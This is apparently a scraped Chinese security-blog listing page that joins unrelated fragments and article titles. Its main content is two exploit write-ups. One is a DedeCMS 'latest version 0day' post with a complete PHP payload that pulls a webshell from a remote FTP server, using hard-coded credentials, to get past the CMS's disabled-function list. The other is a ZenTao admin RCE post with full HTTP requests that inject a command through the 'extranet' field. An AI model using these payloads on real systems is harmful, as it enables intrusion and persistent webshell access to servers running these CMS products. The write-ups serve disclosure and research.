总结简单总结一下通过tls_dtor_list劫持exit执行流程的条件存在任意地址写的漏洞利用能够篡改或泄露fs_base + 0x30的值程序会通过exit函数结束程序，若是通过_exit则不行

Dedecms最新版--0day分享分析(二)

前言接之前写的一篇https://www.yijinglab.com/specialized/20230814150207，既然利用远程文件下载方式成为了实现RCE的最好方法，毕竟在执行的时候没有恶意shell文件，恶意木马被存放于远端服务器，那么下文的day就是对远程恶意文件的利用。环境下载最新版本： https://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7.110-UTF8.zip影响版本： <=DedeCMS-V5.7.110 漏洞URL: /uploads/dede/article_string_mix.php /uploads/dede/sys_data.php /uploads/dede/sys_task.php /uploads/dede/media_add.php /uploads/dede/article_template_rand.php 漏洞详情远程服务器开启ftp服务控制面板 >> 程序 >> 启用或关闭windows功能完成更改计算机管理添加FTP站点配置地址以及账号密码上面存放一句话木马文件内容为 payload如下： <? $ftp_server = "192.168.0.102"; $ftp_username = "administrator"; $ftp_password = "147258369"; $file = "shell.php"; $local_file = "shell2.php"; // set up basic connection $conn_id = ftp_connect($ftp_server); // login with username and password $login_result = ftp_login($conn_id, $ftp_username, $ftp_password); // try to download $file and save to $local_file if (ftp_get($conn_id, $local_file, $file, FTP_BINARY)) { echo "Successfully downloaded $file\n"; } else { echo "There was a problem while downloading $file\n"; } // close the connection ftp_close($conn_id); ?> 代码中的”ftp_server”为远程服务器地址，”ftp_username”为远程ftp登录用户名，”ftp_password”为ftp登录密码，”$file”为远程服务器的shell文件名，”$local_file”为从远程服务器下载木马文件到本地的重命名文件。通过利用ftp_get函数远程下载恶意代码文件，代码中的”ftp_server”为远程服务器地址，”ftp_username”为远程ftp登录用户名，”ftp_password”为ftp登录密码，”$file”为远程服务器的shell文件名，”$local_file”为从远程服务器下载木马文件到本地的重命名文件。文件保存后，访问路径 /uploads/data/template.rand.php 提示已经成功下载一句话木马文件，查看当前目录已经生成名称为shell2.php的shell文件 http://dedecms.xyz:8066/uploads/data/shell1.php 成功命令执行漏洞分析 DedeCMS-V5.7.109-UTF8\uploads\dede\media_add.php 上传文件的时候仅仅只对权限以及上传类型做了校验，对文件内容未做校验导致漏洞产生。继续向下看，文件上传文件处理代码DedeCMS-V5.7.109-UTF8\uploads\dede\file_manage_control.php 代码中定义了disable_funs,但是禁用的函数涉及 phpinfo,eval,assert,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,file_put_contents,fsockopen,fopen,fwrite,preg_replace'; $cfg_disable_funs = $cfg_disable_funs.',[$]GLOBALS,[$]_GET,[$]_POST,[$]_REQUEST,[$]_FILES,[$]_COOKIE,[$]_SERVER,include,require,create_function,array_map,call_user_func,call_user_func_array,array_filert,getallheaders 在上面的payload中，利用手法利用点儿在于 ftp_get函数是可以绕过disable_funs的，使用该函数实现bypass进行远程恶意代码调用，导致RCE。小结其它的方法也可以尝试，ftp远程调用，telnet远程调用等，包括很多方法可以实现，但是使用条件存在限制。其实在Dede由于后台参数可以直接进行配置，代码中disable_funs的定义没有意义，该模块只要存在，只要绕过正则，RCE的方式有很多。

借助AI分析哥斯拉木马原理与Tomcat回显链路挖掘

smartbi token回调获取登录凭证漏洞（二）

从2023蓝帽杯0解题heapSpary入门堆喷

禅道后台命令执行漏洞二

漏洞简介禅道是第一款国产的开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体，是一款专业的研发项目管理软件，完整地覆盖了项目管理的核心流程。禅道管理思想注重实效，功能完备丰富，操作简洁高效，界面美观大方，搜索功能强大，统计报表丰富多样，软件架构合理，扩展灵活，有完善的 API 可以调用。禅道后台存在 RCE 漏洞，存在于 V18.0-18.3 之间，经过复现分析，发现漏洞来源于新增加的一个功能模块。环境搭建源码下载地址 https://www.zentao.net/dl/zentao/18.2/ZenTaoPMS.18.2.php7.2_7.4.zip 利用 phpstudy 来进行环境的搭建漏洞复现登录后台后访问添加宿主机在 ip 域名处拼接恶意 payload 触发漏洞 POST /index.php?m=zahost&f=create HTTP/1.1 Host: test.test Content-Length: 131 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://test.test Referer: http://test.test/index.php?m=zahost&f=create Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: zentaosid=bp9k0pcftu49b2ethm9f32hc5b; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; moduleBrowseParam=0; productBrowseParam=0; executionTaskOrder=status%2Cid_desc; repoBranch=master; lastProduct=1; tab=qa; windowWidth=1440; windowHeight=722 Connection: close vsoft=kvm&hostType=physical&name=test2&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2&memory=1&diskSize=1&desc=&uid=64e46f386d9ea&type=za 漏洞分析这是禅道新增加的一个功能增加新功能的同时也带来了新的风险点 module/zahost/control.php#create module/zahost/model.php#create module/zahost/model.php#checkAddress module/zahost/model.php#ping 整个漏洞触发流程在断点调试的过程中一目了然 POST /index.php?m=zahost&f=edit&hostID=1 HTTP/1.1 Host: test.test Content-Length: 131 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://test.test Referer: http://test.test/index.php?m=zahost&f=create Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: zentaosid=bp9k0pcftu49b2ethm9f32hc5b; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; moduleBrowseParam=0; productBrowseParam=0; executionTaskOrder=status%2Cid_desc; repoBranch=master; lastProduct=1; tab=qa; windowWidth=1440; windowHeight=722;XDEBUG_SESSION=PHPSTORM Connection: close vsoft=kvm&hostType=physical&name=test4&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2&memory=1&diskSize=1&desc=&uid=64e46f386d9ea&type=za 这样也是可以触发的 model.php:119, zahostModel-\>ping() model.php:149, zahostModel-\>checkAddress() model.php:94, zahostModel-\>update() control.php:130, zahost-\>edit() router.class.php:2199, router-\>loadModule() index.php:74, {main}() 修复建议更新至最新版本执行命令时对地址进行了校验

第2页第3页第4页第5页第6页第7页第8页第9页第10页第11页第12页第13页第14页第15页第16页第17页第18页第19页第20页第21页第22页第23页第24页第25页第26页第27页第28页第29页第30页第31页第32页第33页第34页第35页第36页第37页第38页第39页第40页第41页第42页第43页第44页第45页第46页第47页第48页第49页第50页第51页第52页第53页第54页第55页第56页第57页第58页第59页第60页第61页